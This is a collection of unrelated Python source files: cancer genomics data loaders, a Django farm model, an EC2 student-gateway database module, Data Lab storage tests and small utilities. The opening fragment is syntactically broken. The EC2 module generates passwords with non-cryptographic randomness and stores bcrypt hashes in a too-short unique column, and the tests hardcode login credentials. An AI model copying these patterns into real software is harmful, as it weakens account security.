return unity_client.get_backend_port_port_number(idx_name)
class BackendPortPortNumberColumn(object):
def get_idx(self, name, idx, unity_client):
return unity_client.get_backend_ports()
|
def additive_hash(input_string: str) -> int:
"""A stable hash function."""
value = 0
for character in input_string:
value += ord(character)
return value
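# Minimal usage sketch (not part of the original module): the hash is the sum of
# the character code points, so additive_hash("abc") == 97 + 98 + 99 == 294.
assert additive_hash("abc") == 294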
|
"""
Functions for reading and processing input data
"""
import os
import sys
from pathlib import Path
import numpy as np
import pandas as pd
import pickle as pkl
from sklearn.model_selection import KFold, StratifiedKFold
from sklearn.preprocessing import MinMaxScaler
import pancancer_evaluation.config as cfg
def load_expression_data(scale_input=False, verbose=False, debug=False):
"""Load and preprocess saved TCGA gene expression data.
Arguments
---------
scale_input (bool): whether or not to scale the expression data
verbose (bool): whether or not to print verbose output
debug (bool): whether or not to subset data for faster debugging
Returns
-------
rnaseq_df: samples x genes expression dataframe
"""
if debug:
if verbose:
print('Loading subset of gene expression data for debugging...',
file=sys.stderr)
rnaseq_df = pd.read_csv(cfg.test_expression, index_col=0, sep='\t')
else:
if verbose:
print('Loading gene expression data...', file=sys.stderr)
rnaseq_df = pd.read_csv(cfg.rnaseq_data, index_col=0, sep='\t')
# Scale RNAseq matrix the same way RNAseq was scaled for
# compression algorithms
if scale_input:
fitted_scaler = MinMaxScaler().fit(rnaseq_df)
rnaseq_df = pd.DataFrame(
fitted_scaler.transform(rnaseq_df),
columns=rnaseq_df.columns,
index=rnaseq_df.index,
)
return rnaseq_df
def load_pancancer_data(verbose=False, test=False, subset_columns=None):
"""Load pan-cancer relevant data from previous Greene Lab repos.
Data being loaded includes:
* sample_freeze_df: list of samples from TCGA "data freeze" in 2017
* mutation_df: deleterious mutation count information for freeze samples
(this is a samples x genes dataframe, entries are the number of
deleterious mutations in the given gene for the given sample)
* copy_loss_df: copy number loss information for freeze samples
* copy_gain_df: copy number gain information for freeze samples
* mut_burden_df: log10(total deleterious mutations) for freeze samples
Most of this data was originally compiled and documented in Greg's
pancancer repo: http://github.com/greenelab/pancancer
See, e.g.
https://github.com/greenelab/pancancer/blob/master/scripts/initialize/process_sample_freeze.py
for more info on mutation processing steps.
Arguments
---------
    verbose (bool): whether or not to print verbose output
    test (bool): whether or not to use the test data cache
    subset_columns: optional list of gene columns to subset the mutation/CNV data to
Returns
-------
pancan_data: TCGA "data freeze" mutation information described above
"""
# loading this data from the pancancer repo is very slow, so we
# cache it in a pickle to speed up loading
if test:
data_filepath = cfg.test_pancan_data
else:
data_filepath = cfg.pancan_data
if os.path.exists(data_filepath):
if verbose:
print('Loading pan-cancer data from cached pickle file...', file=sys.stderr)
with open(data_filepath, 'rb') as f:
pancan_data = pkl.load(f)
else:
if verbose:
print('Loading pan-cancer data from repo (warning: slow)...', file=sys.stderr)
pancan_data = load_pancancer_data_from_repo(subset_columns)
with open(data_filepath, 'wb') as f:
pkl.dump(pancan_data, f)
return pancan_data
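# Hedged usage sketch (not part of the original module): callers typically unpack
# the cached 5-tuple returned above, e.g.
#   (sample_freeze_df, mutation_df, copy_loss_df,
#    copy_gain_df, mut_burden_df) = load_pancancer_data(verbose=True)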
def load_top_50():
"""Load top 50 mutated genes in TCGA from BioBombe repo.
These were precomputed for the equivalent experiments in the
BioBombe paper, so no need to recompute them.
"""
base_url = "https://github.com/greenelab/BioBombe/raw"
commit = "aedc9dfd0503edfc5f25611f5eb112675b99edc9"
file = "{}/{}/9.tcga-classify/data/top50_mutated_genes.tsv".format(
base_url, commit)
genes_df = pd.read_csv(file, sep='\t')
return genes_df
def load_vogelstein():
"""Load list of cancer-relevant genes from Vogelstein and Kinzler,
Nature Medicine 2004 (https://doi.org/10.1038/nm1087)
These genes and their oncogene or TSG status were precomputed in
the pancancer repo, so we just load them from there.
"""
base_url = "https://github.com/greenelab/pancancer/raw"
commit = "2a0683b68017fb226f4053e63415e4356191734f"
file = "{}/{}/data/vogelstein_cancergenes.tsv".format(
base_url, commit)
genes_df = (
pd.read_csv(file, sep='\t')
.rename(columns={'Gene Symbol' : 'gene',
'Classification*': 'classification'})
)
return genes_df
def get_classification(gene, genes_df=None):
"""Get oncogene/TSG classification from existing datasets for given gene."""
classification = 'neither'
    # membership must be checked against the Series values (the index holds row numbers)
    if (genes_df is not None) and (gene in genes_df.gene.values):
        classification = genes_df[genes_df.gene == gene].classification.iloc[0]
    else:
        genes_df = load_vogelstein()
        if gene in genes_df.gene.values:
            classification = genes_df[genes_df.gene == gene].classification.iloc[0]
        else:
            genes_df = load_top_50()
            if gene in genes_df.gene.values:
                classification = genes_df[genes_df.gene == gene].classification.iloc[0]
return classification
def load_pancancer_data_from_repo(subset_columns=None):
"""Load data to build feature matrices from pancancer repo. """
base_url = "https://github.com/greenelab/pancancer/raw"
commit = "2a0683b68017fb226f4053e63415e4356191734f"
file = "{}/{}/data/sample_freeze.tsv".format(base_url, commit)
sample_freeze_df = pd.read_csv(file, index_col=0, sep='\t')
file = "{}/{}/data/pancan_mutation_freeze.tsv.gz".format(base_url, commit)
mutation_df = pd.read_csv(file, index_col=0, sep='\t')
file = "{}/{}/data/copy_number_loss_status.tsv.gz".format(base_url, commit)
copy_loss_df = pd.read_csv(file, index_col=0, sep='\t')
file = "{}/{}/data/copy_number_gain_status.tsv.gz".format(base_url, commit)
copy_gain_df = pd.read_csv(file, index_col=0, sep='\t')
file = "{}/{}/data/mutation_burden_freeze.tsv".format(base_url, commit)
mut_burden_df = pd.read_csv(file, index_col=0, sep='\t')
if subset_columns is not None:
# don't reindex sample_freeze_df or mut_burden_df
# they don't have gene-valued columns
mutation_df = mutation_df.reindex(subset_columns, axis='columns')
copy_loss_df = copy_loss_df.reindex(subset_columns, axis='columns')
copy_gain_df = copy_gain_df.reindex(subset_columns, axis='columns')
return (
sample_freeze_df,
mutation_df,
copy_loss_df,
copy_gain_df,
mut_burden_df
)
def load_sample_info(verbose=False):
if verbose:
print('Loading sample info...', file=sys.stderr)
return pd.read_csv(cfg.sample_info, sep='\t', index_col='sample_id')
def split_stratified(rnaseq_df, sample_info_df, num_folds=4, fold_no=1,
seed=cfg.default_seed):
"""Split expression data into train and test sets.
The train and test sets will both contain data from all cancer types,
in roughly equal proportions.
Arguments
---------
rnaseq_df (pd.DataFrame): samples x genes expression dataframe
sample_info_df (pd.DataFrame): maps samples to cancer types
num_folds (int): number of cross-validation folds
fold_no (int): cross-validation fold to hold out
seed (int): seed for deterministic splits
Returns
-------
rnaseq_train_df (pd.DataFrame): samples x genes train data
    rnaseq_test_df (pd.DataFrame): samples x genes test data
    sample_info_df (pd.DataFrame): sample info annotated with stratification ids
    """
# subset sample info to samples in pre-filtered expression data
sample_info_df = sample_info_df.reindex(rnaseq_df.index)
# generate id for stratification
# this is a concatenation of cancer type and sample/tumor type, since we want
# to stratify by both
sample_info_df = sample_info_df.assign(
id_for_stratification = sample_info_df.cancer_type.str.cat(
sample_info_df.sample_type)
)
# recode stratification id if they are singletons or near-singletons,
# since these won't work with StratifiedKFold
stratify_counts = sample_info_df.id_for_stratification.value_counts().to_dict()
sample_info_df = sample_info_df.assign(
stratify_samples_count = sample_info_df.id_for_stratification
)
sample_info_df.stratify_samples_count = sample_info_df.stratify_samples_count.replace(
stratify_counts)
sample_info_df.loc[
sample_info_df.stratify_samples_count < num_folds, 'id_for_stratification'
] = 'other'
# now do stratified CV splitting and return the desired fold
kf = StratifiedKFold(n_splits=num_folds, shuffle=True, random_state=seed)
for fold, (train_ixs, test_ixs) in enumerate(
kf.split(rnaseq_df, sample_info_df.id_for_stratification)):
if fold == fold_no:
train_df = rnaseq_df.iloc[train_ixs]
test_df = rnaseq_df.iloc[test_ixs]
return train_df, test_df, sample_info_df
def split_by_cancer_type(rnaseq_df,
sample_info_df,
holdout_cancer_type,
use_pancancer=False,
use_pancancer_only=False,
num_folds=4,
fold_no=1,
seed=cfg.default_seed):
"""Split expression data into train and test sets.
The test set will contain data from a single cancer type. The train set
will contain either the remaining data from that cancer type, or the
remaining data from that cancer type and data from all other cancer types
in the dataset.
Arguments
---------
rnaseq_df (pd.DataFrame): samples x genes expression dataframe
sample_info_df (pd.DataFrame): maps samples to cancer types
holdout_cancer_type (str): cancer type to hold out
use_pancancer (bool): whether or not to include pan-cancer data in train set
use_pancancer_only (bool): if True, use only pan-cancer data as train set
(i.e. without data from the held-out cancer type)
num_folds (int): number of cross-validation folds
fold_no (int): cross-validation fold to hold out
seed (int): seed for deterministic splits
Returns
-------
rnaseq_train_df (pd.DataFrame): samples x genes train data
rnaseq_test_df (pd.DataFrame): samples x genes test data
"""
cancer_type_sample_ids = (
sample_info_df.loc[sample_info_df.cancer_type == holdout_cancer_type]
.index
)
cancer_type_df = rnaseq_df.loc[rnaseq_df.index.intersection(cancer_type_sample_ids), :]
cancer_type_train_df, rnaseq_test_df = split_single_cancer_type(
cancer_type_df, num_folds, fold_no, seed)
if use_pancancer or use_pancancer_only:
pancancer_sample_ids = (
sample_info_df.loc[~(sample_info_df.cancer_type == holdout_cancer_type)]
.index
)
pancancer_df = rnaseq_df.loc[rnaseq_df.index.intersection(pancancer_sample_ids), :]
if use_pancancer:
rnaseq_train_df = pd.concat((pancancer_df, cancer_type_train_df))
elif use_pancancer_only:
rnaseq_train_df = pancancer_df
else:
rnaseq_train_df = cancer_type_train_df
return rnaseq_train_df, rnaseq_test_df
def split_single_cancer_type(cancer_type_df, num_folds, fold_no, seed):
"""Split data for a single cancer type into train and test sets."""
kf = KFold(n_splits=num_folds, shuffle=True, random_state=seed)
for fold, (train_ixs, test_ixs) in enumerate(kf.split(cancer_type_df)):
if fold == fold_no:
train_df = cancer_type_df.iloc[train_ixs]
test_df = cancer_type_df.iloc[test_ixs]
return train_df, test_df
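# Hedged usage sketch (not part of the original module): holding out a single
# cancer type for evaluation while training on the remaining pan-cancer data.
# The cancer type code 'LUAD' is illustrative.
def _example_holdout_split(fold_no=0, seed=cfg.default_seed):
    rnaseq_df = load_expression_data(verbose=True)
    sample_info_df = load_sample_info(verbose=True)
    return split_by_cancer_type(
        rnaseq_df,
        sample_info_df,
        holdout_cancer_type='LUAD',
        use_pancancer=True,
        fold_no=fold_no,
        seed=seed,
    )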
def summarize_results(results, gene, holdout_cancer_type, signal, z_dim,
seed, algorithm, data_type):
"""
Given an input results file, summarize and output all pertinent files
Arguments
---------
results: a results object output from `get_threshold_metrics`
gene: the gene being predicted
holdout_cancer_type: the cancer type being used as holdout data
signal: the signal of interest
z_dim: the internal bottleneck dimension of the compression model
seed: the seed used to compress the data
algorithm: the algorithm used to compress the data
data_type: the type of data (either training, testing, or cv)
"""
results_append_list = [
gene,
holdout_cancer_type,
signal,
z_dim,
seed,
algorithm,
data_type,
]
metrics_out_ = [results["auroc"], results["aupr"]] + results_append_list
roc_df_ = results["roc_df"]
pr_df_ = results["pr_df"]
roc_df_ = roc_df_.assign(
predictor=gene,
signal=signal,
z_dim=z_dim,
seed=seed,
algorithm=algorithm,
data_type=data_type,
)
pr_df_ = pr_df_.assign(
predictor=gene,
signal=signal,
z_dim=z_dim,
seed=seed,
algorithm=algorithm,
data_type=data_type,
)
return metrics_out_, roc_df_, pr_df_
|
try:
import binutil # required to import from dreamcoder modules
except ModuleNotFoundError:
import bin.binutil # alt import if called as module
from neural_seq.model import main
from neural_seq.utils import commandLineArgs
from neural_seq import decoderUtils
import os
if __name__ == '__main__':
print("current PID:{}".format(os.getpid()))
args = commandLineArgs()
main(args)
|
# This file contains the objects to be used in conjunction with SQLAlchemy
# Splitting this file so that the cloud computing elements live in their own module
# would allow for a more loosely coupled architecture.
import string
import random
import boto3
from sqlalchemy import create_engine, Column, Integer, String, ForeignKey, Boolean
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import json
import time
import bcrypt
engine = create_engine('sqlite:///gateway.db', echo=True)
Base = declarative_base()
ec2 = boto3.resource('ec2')
client = boto3.client('ec2')
Session = sessionmaker(bind=engine)
class dbUser(Base):
    # Use the set_* helper methods below to populate these fields as needed
__tablename__ = "dbUser"
userName = Column('username', Integer, primary_key=True)
password = Column('password', String(16), unique=True)
firstName = Column('firstname', String(20), nullable=False)
lastName = Column('lastname', String(20), nullable=False)
eMail = Column('email', String(20), nullable=False)
studentID = Column('id', Integer, unique=True)
assigned_VM = Column('userVM', String, ForeignKey('dbComputer.InstanceIpAddress'))
isTeacher = Column('teacher', Boolean, default=False)
isSuspended = Column('suspended', Boolean, default=False)
visitorsLog = Column('vLog', String)
def __repr__(self):
return f"User('{self.userName}', '{self.firstName}', '{self.lastName}', '{self.assigned_VM}')"
def __init__(self, fN, lN, ID, eM = None):
self.firstName = fN
self.lastName = lN
self.studentID = ID
self.eMail = eM
self.userName = self.studentID
# This function creates a user_name from the student ID
def set_auto_user_name(self):
self.userName = self.studentID
# This function creates a random password of 8 characters.
def set_auto_password(self, size = 8, chars=string.ascii_letters + string.digits + string.punctuation):
unencrypted_password = ''.join(random.choice(chars) for _ in range(size))
salt = bcrypt.gensalt()
hatch = bcrypt.hashpw(unencrypted_password.encode('utf-8'), salt)
self.password = hatch
return unencrypted_password
def set_custom_user_name(self, uN):
self.userName = uN
def set_custom_password(self, pW):
salt = bcrypt.gensalt()
hatch = bcrypt.hashpw(pW.encode('utf-8'), salt)
self.password = hatch
def set_suspension(self, bool):
self.isSuspended = bool
def set_teacher(self, bool):
self.isTeacher = bool
def get_suspension(self):
return self.isSuspended
def get_teacher(self):
return self.isTeacher
def get_password(self):
return self.password
def get_user_name(self):
return self.userName
def get_log(self):
return json.loads(self.visitorsLog)
def set_log(self, dict_json):
self.visitorsLog = json.dumps(dict_json)
def add_to_log(self, key, value):
dict_log = self.get_log()
dict_log[key] = value
self.set_log(dict_log)
class dbComputer(Base):
__tablename__ = "dbComputer"
InstanceId = Column('instanceId', String, primary_key=True)
InstanceIpAddress = Column('InstanceIpAddress', String)
InstanceLog = Column('log', String)
def __init__(self, aimID, type, key, security_group):
instance = ec2.create_instances(
ImageId=aimID,
MinCount=1,
MaxCount=1,
InstanceType=type,
KeyName=key,
SecurityGroupIds=security_group
)
self.instanceObject = instance[0]
self.InstanceId = self.instanceObject.id
def start_instance(self):
client.start_instances(InstanceIds=[self.InstanceId])
start = time.time()
self.add_to_log("Start Time", start)
def stop_instance(self):
client.stop_instances(InstanceIds=[self.InstanceId])
# end = time.time()
log = self.get_log()
end = time.time()
start = log["Start Time"]
duration = end - start
if log["On Time"]:
onTime = log["On Time"]
onTime.append(duration)
log["On Time"] = onTime
self.set_log(log)
def delete_instance(self):
client.terminate_instances(InstanceIds=[self.InstanceId])
def get_instance_ip(self):
instance = ec2.Instance(self.InstanceId)
self.InstanceIpAddress = instance.public_ip_address
return self.InstanceIpAddress
def get_instance_id(self):
return self.InstanceId
    # TODO: add a timeout; boto3 waiters accept a WaiterConfig with Delay/MaxAttempts.
def is_instance_ready(self):
waiter = client.get_waiter('instance_status_ok')
waiter.wait(InstanceIds=[self.InstanceId])
return True
def get_up_time(self):
log = self.get_log()
log_times = log["On Time"]
total_up_time = 0
for period in log_times:
total_up_time += period
return total_up_time
def get_log(self):
log = self.InstanceLog
if log is not None:
return json.loads(log)
else:
return {}
def set_log(self, dict_json):
self.InstanceLog = json.dumps(dict_json)
def add_to_log(self, key, value):
dict_log = self.get_log()
dict_log[key] = value
self.set_log(dict_log)
def get_info(self):
response = client.describe_instances(InstanceIds=[self.InstanceId])
return response
# Base.metadata.drop_all(engine)
# Base.metadata.create_all(engine)
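# Hedged usage sketch (not part of the original module): creating the tables and
# persisting a user with an auto-generated password. The student data shown is
# illustrative; note that importing this module already requires AWS credentials
# because of the boto3 clients created above.
def _example_create_user():
    Base.metadata.create_all(engine)
    user = dbUser("Ada", "Lovelace", 12345, "ada@example.com")
    plain_password = user.set_auto_password()
    session = Session()
    session.add(user)
    session.commit()
    return user.get_user_name(), plain_password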
|
from django.db import models
from django.contrib.auth.models import AbstractUser
# Create your models here.
class Finca(models.Model):
nombre_finca = models.CharField(max_length=150, unique=True)
ubicacion = models.CharField(max_length=150)
latitud = models.CharField(max_length=150)
longitud = models.CharField(max_length=150)
propietario = models.ForeignKey('CustomUser', on_delete=models.CASCADE)
imagen = models.ImageField(upload_to='images/')
create_at= models.DateTimeField(auto_now=True)
estado=models.BooleanField(default=False)
def __str__(self):
return self.nombre_finca
class Cultivo(models.Model):
nombre_lote = models.CharField(max_length=150)
dimancion_lote = models.CharField(max_length=150)
fecha_siembra = models.DateField()
tiempo_cosecha = models.CharField(max_length=150)
planta = models.ForeignKey('Planta', on_delete=models.CASCADE)
finca = models.ForeignKey('Finca', on_delete=models.CASCADE)
create_at= models.DateTimeField(auto_now=True)
estado=models.BooleanField(default=False)
def __str__(self):
return self.nombre_lote
class Planta(models.Model):
nombre_planta = models.CharField(max_length=150, unique=True)
nombre_cientifico = models.CharField(max_length=150)
familia = models.CharField(max_length=150)
genero = models.CharField(max_length=150)
imagen = models.ImageField(upload_to='images/')
create_at= models.DateTimeField(auto_now=True)
estado=models.BooleanField(default=False)
def __str__(self):
return self.nombre_planta
class Expediente(models.Model):
finca = models.OneToOneField('Finca', on_delete=models.CASCADE, unique=True)
propietario = models.ForeignKey('CustomUser', on_delete=models.CASCADE)
direccion = models.CharField(max_length=150)
total_cultivos = models.CharField(max_length=150)
identificacion = models.CharField(max_length=150)
plantas_existentes = models.CharField(max_length=150)
total_plantas = models.CharField(max_length=150)
create_at= models.DateTimeField(auto_now=True)
estado=models.BooleanField(default=False)
class CustomUser(AbstractUser):
cedula = models.CharField(max_length=10,unique=True)
celular = models.CharField(max_length=10)
email = models.EmailField(unique=True)
type_user = models.CharField(max_length=10)
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = ["email","cedula"]
create_at= models.DateTimeField(auto_now=True)
estado=models.BooleanField(default=False)
def __str__(self):
return self.username
|
#!/usr/bin/env python
# D. Nidever
#
# testdlinterface.py
# Python code to (unit) test the DL Interface operations
from dl.dlinterface import Dlinterface
from dl import authClient, storeClient, queryClient
import os
import unittest
try:
from urllib import urlencode, quote_plus # Python 2
from urllib2 import urlopen, Request # Python 2
except ImportError:
from urllib.parse import urlencode, quote_plus # Python 3
from urllib.request import urlopen, Request # Python 3
import requests
from astropy.table import Table
import numpy as np
from io import StringIO
import time
import sys
class Capturing(list):
def __enter__(self):
self._stdout = sys.stdout
sys.stdout = self._stringio = StringIO()
return self
def __exit__(self, *args):
self.extend(self._stringio.getvalue().splitlines())
del self._stringio # free up some memory
sys.stdout = self._stdout
# Service URLs
AM_URL = "http://dlsvcs.datalab.noao.edu/auth" # Auth Manager
SM_URL = "http://dlsvcs.datalab.noao.edu/storage" # Storage Manager
QM_URL = "http://dlsvcs.datalab.noao.edu/query" # Query Manager
# Test token
TEST_TOKEN = "dltest.99998.99998.test_access"
# Create test data sample
testdata = 'id,ra,dec\n'\
'77.1096574,150.552192729936,-32.7846851370221\n'\
'77.572838,150.55443538686,-32.7850014657006\n'
qryresid = np.array(['77.1096574','77.572838'])
qryresra = np.array([150.552192729936,150.55443538686])
qryresdec = np.array([-32.7846851370221,-32.7850014657006])
# Test query
qry = "select id,ra,dec from smash_dr1.object where "\
"(ra > 180 and ra < 180.1 and dec > -36.3 and dec < -36.2) "\
"order by ra limit 2"
qryadql = "select TOP 2 id,ra,dec from smash_dr1.object where "\
"(ra > 180 and ra < 180.1 and dec > -36.3 and dec < -36.2) "\
"order by ra"
# Test query results
qryrescsv = 'id,ra,dec\n'\
'109.127614,180.000153966131,-36.2301641016901\n'\
'109.128390,180.000208026483,-36.2290234336001\n'
qryresascii = '109.127614\t180.000153966131\t'\
'-36.2301641016901\n109.128390\t'\
'180.000208026483\t-36.2290234336001\n'
qryid = np.array(['109.127614','109.128390'])
qryra = np.array([180.000153966, 180.000208026])
qrydec = np.array([-36.2301641017, -36.2290234336])
qryresvotablesql = '<?xml version="1.0" encoding="utf-8"?>\n<!-- Produced with astropy.io.votable version 1.3.2\n http://www.astropy.org/ -->\n<VOTABLE version="1.2" xmlns="http://www.ivoa.net/xml/VOTable/v1.2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.ivoa.net/xml/VOTable/v1.2">\n <RESOURCE type="results">\n <TABLE>\n <FIELD ID="id" arraysize="10" datatype="char" name="id"/>\n <FIELD ID="ra" datatype="double" name="ra"/>\n <FIELD ID="dec" datatype="double" name="dec"/>\n <DATA>\n <TABLEDATA>\n <TR>\n <TD>109.127614</TD>\n <TD>180.00015396613099</TD>\n <TD>-36.2301641016901</TD>\n </TR>\n <TR>\n <TD>109.128390</TD>\n <TD>180.00020802648299</TD>\n <TD>-36.229023433600098</TD>\n </TR>\n </TABLEDATA>\n </DATA>\n </TABLE>\n </RESOURCE>\n</VOTABLE>\n'
qryresvotableadql = '<?xml version="1.0" encoding="UTF-8"?>\n<VOTABLE xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\nxsi:noNamespaceSchemaLocation="xmlns:http://www.ivoa.net/xml/VOTable-1.2.xsd" version="1.2">\n<RESOURCE type="results">\n<DESCRIPTION>DALServer TAP Query</DESCRIPTION>\n<INFO name="QUERY_STATUS" value="OK"/>\n<INFO name="QUERY" value="select TOP 2 id,ra,dec from smash_dr1.object where (ra > 180 and ra < 180.1 and dec > -36.3 and dec < -36.2) order by ra"/>\n<INFO name="TableRows" value="2"/>\n<TABLE>\n<FIELD ID="id" name="id" datatype="char" ucd="meta.id;meta.main" arraysize="10" unit="None">\n<DESCRIPTION>Unique ID for this object, the field name plus a running number</DESCRIPTION>\n</FIELD>\n<FIELD ID="ra" name="ra" datatype="double" ucd="pos.eq.ra;meta.main" unit="Degrees">\n<DESCRIPTION>Right Ascension (J2000.0) of source, in degrees</DESCRIPTION>\n</FIELD>\n<FIELD ID="dec" name="dec" datatype="double" ucd="pos.eq.dec;meta.main" unit="Degrees">\n<DESCRIPTION>Declination (J2000.0) of source, in degrees</DESCRIPTION>\n</FIELD>\n<DATA>\n<TABLEDATA>\n<TR><TD>109.127614</TD><TD>180.00015396613091</TD><TD>-36.230164101690086</TD></TR>\n<TR><TD>109.128390</TD><TD>180.00020802648334</TD><TD>-36.22902343360014</TD></TR>\n</TABLEDATA>\n</DATA>\n</TABLE>\n</RESOURCE>\n</VOTABLE>\n'
def login(dl):
token = authClient.login('dltest','datalab')
dl.loginuser = 'dltest'
dl.dl.save("login", "status", "loggedin")
dl.dl.save("login", "user", "dltest")
dl.dl.save("login", "authtoken", token)
dl.dl.save("dltest", "authtoken", token)
dl.loginstatus = "loggedin"
def logout(dl):
token = dl.dl.get('login','authtoken')
user, uid, gid, hash = token.strip().split('.', 3)
res = authClient.logout (token)
dl.dl.save("login", "status", "loggedout")
dl.dl.save("login", "user", "")
dl.dl.save("login", "authtoken", "")
dl.loginstatus = "loggedout"
def suite():
suite = unittest.TestSuite()
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestHelp))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestLogin))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestLogout))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestStatus))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestWhoami))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestServiceStatus))
suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestList))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestGet))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestPut))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestCopy))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestMove))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestRemove))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestMkdir))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestRmdir))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestLink))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestLoad))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestSave))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestCopyURL))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestQuery))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestQueryHistory))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestQueryResults))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestQueryStatus))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestQueryProfiles))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestSchema))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestDropTable))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestExportTable))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestListDB))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestSIAQuery))
return suite
class TestList(unittest.TestCase):
def setUp(self):
self.file1 = 'lstest1.csv'
self.file2 = 'lstest2.csv'
self.dir1 = 'lstest1'
self.dir2 = 'lstest2'
self.file3 = self.dir1+'/'+self.file1
self.testdata = testdata
fh = open(self.file1,'w')
fh.write(testdata)
fh.close()
# Delete input file1 if it exists already
if storeClient.ls(TEST_TOKEN,self.file1,'csv') != '':
storeClient.rm(TEST_TOKEN,self.file1)
# Delete input file2 if it exists already
if storeClient.ls(TEST_TOKEN,self.file2,'csv') != '':
storeClient.rm(TEST_TOKEN,self.file2)
# Create dir1 if it does NOT exist already
if storeClient.ls(TEST_TOKEN,self.dir1,'csv') == '':
storeClient.mkdir(TEST_TOKEN,self.dir1)
# Delete dir2 if it exists already
if storeClient.ls(TEST_TOKEN,self.dir2,'csv') != '':
storeClient.rmdir(TEST_TOKEN,self.dir2)
# Put local file to VOSpace
storeClient.put(TEST_TOKEN,self.file1,self.file1)
# Put local file to VOSpace directory
storeClient.put(TEST_TOKEN,self.file1,self.file3)
# Delete temporary local test file
os.remove(self.file1)
def tearDown(self):
# Delete file1 if it exists
if storeClient.ls(TEST_TOKEN,self.file1,'csv') != '':
storeClient.rm(TEST_TOKEN,self.file1)
# Delete file2 if it exists
if storeClient.ls(TEST_TOKEN,self.file2,'csv') != '':
storeClient.rm(TEST_TOKEN,self.file2)
# Delete file2 if it exists
if storeClient.ls(TEST_TOKEN,self.file3,'csv') != '':
storeClient.rm(TEST_TOKEN,self.file3)
# Delete dir1 if it exists
if storeClient.ls(TEST_TOKEN,self.dir1,'csv') != '':
storeClient.rmdir(TEST_TOKEN,self.dir1)
# Delete dir2 if it exists
if storeClient.ls(TEST_TOKEN,self.dir2,'csv') != '':
storeClient.rmdir(TEST_TOKEN,self.dir2)
def test_list(self):
pass
#dl = Dlinterface()
#login(dl)
## Make sure that file1 exists in VOSpace
#with Capturing() as output:
# dl.ls(self.file1)
#self.assertEqual(output[0].strip(),self.file1)
## Make sure that file2 does NOT exist in VOSpace
#with Capturing() as output:
# dl.ls(self.file2)
#self.assertEqual(output[0].strip(),'')
## Make sure that file3 exists in VOSpace
#with Capturing() as output:
# dl.ls(self.file3)
#self.assertEqual(output[0].strip(),os.path.basename(self.file3))
## Make sure that dir1 exists in VOSpace and contains file3
## which has the same base name as file1
#with Capturing() as output:
# dl.ls(self.dir1)
#self.assertEqual(output[0].strip(),self.file1)
## Make sure that dir2 does NOT exist in VOSpace
#with Capturing() as output:
# dl.ls(self.dir2)
#self.assertEqual(output[0].strip(),'')
#logout(dl)
if __name__ == '__main__':
suite = suite()
unittest.TextTestRunner(verbosity = 2).run(suite)
|
# -*- coding: utf-8 -*-
## \package globals.debug
# MIT licensing
# See: LICENSE.txt
from globals.commandline import GetOption
class dmode:
QUIET = 0
INFO = 1
WARN = 2
ERROR = 3
DEBUG = 4
name = {
QUIET: u'QUIET',
INFO: u'INFO',
WARN: u'WARN',
ERROR: u'ERROR',
DEBUG: u'DEBUG',
}
LogLevel = dmode.ERROR
def SetLogLevel(lvl):
global LogLevel
if isinstance(lvl, int):
LogLevel = lvl
return True
if isinstance(lvl, (unicode, str)):
if lvl.isnumeric():
LogLevel = int(lvl)
return True
for L in dmode.name:
if lvl.upper() == dmode.name[L]:
LogLevel = L
return True
return False
new_level = GetOption(u'log-level')
if new_level != None:
SetLogLevel(new_level)
def dprint(msg, mode, module=None, line=None, newline=True):
if mode <= LogLevel:
if module != None:
if line != None:
msg = u'[{}:{}] {}'.format(module, line, msg)
mode = dmode.name[mode]
if newline:
mode = u'\n{}'.format(mode)
print(u'{}: {}'.format(mode, msg))
def pDebug(msg, module=None, line=None, newline=True):
dprint(msg, dmode.DEBUG, module, line, newline)
def pError(msg, module=None, line=None, newline=True):
dprint(msg, dmode.ERROR, module, line, newline)
def pInfo(msg, module=None, line=None, newline=True):
dprint(msg, dmode.INFO, module, line, newline)
def pWarn(msg, module=None, line=None, newline=True):
dprint(msg, dmode.WARN, module, line, newline)
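# Minimal usage sketch (not part of the original module): with the default log
# level of dmode.ERROR, INFO/WARN/ERROR messages are printed while DEBUG output
# is suppressed.
if __name__ == '__main__':
    pInfo(u'printed at the default log level')
    pDebug(u'suppressed at the default log level', module=u'globals.debug', line=42)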
|
import numpy as np
from . import UncertMath
class ClusterList(object):
def __init__(self,ratios,nbins):
super(ClusterList, self).__init__()
self.nbins = nbins
self.ratios = ratios
        # Create an array to hold bin assignments and initially set all to -1 == not clustered
        self.bin_assign = np.empty((nbins,), dtype=int)
        self.bin_assign.fill(-1)
        # Initialize an uncertainty container to hold per-bin information; initially mask all elements
        # note: masking is implicit since rates are set to 0
dum_data = np.zeros((nbins,))
self.bin_data = UncertMath.UncertContainer(dum_data.copy(),dum_data.copy(),dum_data.copy())
